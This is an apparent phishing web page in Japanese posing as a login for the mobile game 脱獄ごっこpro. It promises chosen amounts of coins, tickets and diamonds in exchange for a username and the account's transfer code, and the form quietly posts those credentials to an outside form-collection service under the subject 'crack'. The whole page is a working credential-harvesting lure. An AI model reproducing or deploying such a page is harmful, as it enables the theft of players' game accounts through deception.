<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>main_frontsight</title>
    <link rel="stylesheet" href="style.css" />
  </head>
  
  <body>
<div class="contact-form">
    <p class="title">脱獄ごっこproにログイン</p>

    <form action="https://api.staticforms.xyz/submit" method="post">
      <input type="hidden" name="accessKey" value="e24f5504-661b-4bb9-8069-91e180ddabc7">
      <input type="hidden" name="subject" value="crack">
<style>
body {
  background-color: #393B3C; 
}

  input[type=checkbox] {
  inline-size: 1rem;
  block-size: 1rem;
  }

.item {
font-family: sans-serif;
  color: #fff;
  font-size: 100%;
} 

input[type="submit"] {

    width: 373px;
    height: 43px;
    display: block;
    /*コレ*/background: transparent;
    border: 2px solid #FFF;
    text-align: center;
    text-decoration: none;
    color: #fff;
    font-size: 120%;
    font-weight: bold;
}

.label {
 color: #fff;
 font-family: sans-serif;
  font-weight:bolder;

}
  
input[type="text"] {
  outline:solid 0.2px #414141;
   outline: none;
  color: #ffffff;
    background-color: #111012; 
  border: solid 1px #aaa;
  border-radius: 5px;
  padding: 10px;
  height: 20px;
  width: 350px;
  font-size: 15px;
}


.title {
  text-align: center;
  font-size: 160%;
  font-weight:bold;
  color: #fff;
  margin-bottom: 20px;
  font-family: Fira Sans;
}

textarea {
  color: #ffffff;
    background-color: #111012; 
  border: solid 1px #aaa;
  border-radius: 5px;
  padding: 10px;
  height: 20px;
  width: 350px;
  font-size: 15px;
}
</style>
       <div class="item">
        <input type="text" name="name" placeholder="ユーザーネーム" minlength="3" maxlength="20" pattern="^[a-zA-Z0-9_@]+$" required>
      </div>
<br>
      <div class="item">
       <input type="text" name="name" placeholder="引き継ぎコード" minlength="8" class="inputs" required/>
      </div>

      <div class="item">
        <p class="label">応募するitemを選択</p>
        <div class="inputs">
          <input id="s" type="checkbox" name="menu" value="s" /><label for="s"
            >Pコイン数指定</label
          >
          <input id="a" type="checkbox" name="menu" value="a" /><label for="a"
            >Pチケット数指定</label
          >
  <div class="inputs">
          <input id="s" type="checkbox" name="menu" value="s" /><label for="s"
            >プレミアムガチャチケット数指定</label
          >
          <input id="a" type="checkbox" name="menu" value="a" /><label for="a"
            >Pシール数指定</label
          >
          <br>
          <input id="b" type="checkbox" name="menu" value="b" /><label for="b"
            >ダイヤ数指定</label
          >
        </div>
      </div>
<br>
        <div class="item">
          <label class="label">取得するアイテム数を入力</label>
          <input type="text" placeholder="取得する値を入力" pattern="^[a-zA-Z0-9_@]+$" required>
      </div>
        </div>
   <br> 
        <div class="button-area">
          <input type="submit" value="ログイン" />
        </div>
      </div>
    </form>
</div>
  </body>
</html>

